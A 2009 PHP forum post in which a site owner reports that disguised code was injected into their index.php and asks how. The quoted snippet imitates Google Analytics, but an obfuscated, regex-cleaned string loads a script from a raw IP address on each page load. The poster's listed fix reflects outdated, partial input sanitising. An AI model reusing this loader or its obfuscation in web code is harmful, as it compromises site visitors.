TalkPHP - View Single Post

cecilia · 06-11-2009, 03:27 PM

I cant think of how it was done, somehow this code got inserted onto my index.php at the very bottom. Im thinking coz the page to login to the site is behind a password protected folder and theres no other textareas or text input boxes anywhere else. Does this mean the attacker somehow got a correct login and password combination?

I dont know why but all of this started happening since I used notepad++ to do my stuff, Ive always just did it directly from the cpanel. so Im starting to wonder if my computer got infected with something or... I dont know.

I mean im acknowledging that there might have been an input box or something that I missed behind the login page but, you have to get in past it to access that right so...

thank you all for the input

javascript Code:

<?php echo '<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#|@|&|\$|\)|\!|\^|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7623457-2");
pageTracker._trackPageview();
} catch(err) {}</script>'; ?>

EDIT:

I just looked through the entire site, I applied stripslashes, strip_tags and mysql_real_escape_string on all of the user inputs that I missed.

06-11-2009, 03:27 PM	#1 (permalink)
cecilia The Contributor Join Date: May 2009 Location: LA, CA Posts: 87 Thanks: 0	Inserting into the index I cant think of how it was done, somehow this code got inserted onto my index.php at the very bottom. Im thinking coz the page to login to the site is behind a password protected folder and theres no other textareas or text input boxes anywhere else. Does this mean the attacker somehow got a correct login and password combination? I dont know why but all of this started happening since I used notepad++ to do my stuff, Ive always just did it directly from the cpanel. so Im starting to wonder if my computer got infected with something or... I dont know. I mean im acknowledging that there might have been an input box or something that I missed behind the login page but, you have to get in past it to access that right so... thank you all for the input javascript Code: <?php echo '<script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript sr?='" + gaJsHost + "google-analytics.com/ga.js' " + '#@!s(&r)c@#=!)\'!h$#t^!#$@t@!$p&^!@:$^/!@#!/#9(1)@.(2)1#(2)!.^&6!@!#^5(@#!.!&$1@#4)8#&/($g&$a!.(j^s)'.replace(/#\|@\|&\|\$\|\)\|\!\|\^\|\(/ig, '') + "' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-7623457-2"); pageTracker._trackPageview(); } catch(err) {}</script>'; ?> EDIT: I just looked through the entire site, I applied stripslashes, strip_tags and mysql_real_escape_string on all of the user inputs that I missed. Last edited by codefreek : 06-25-2009 at 04:54 PM. Reason: highlight added.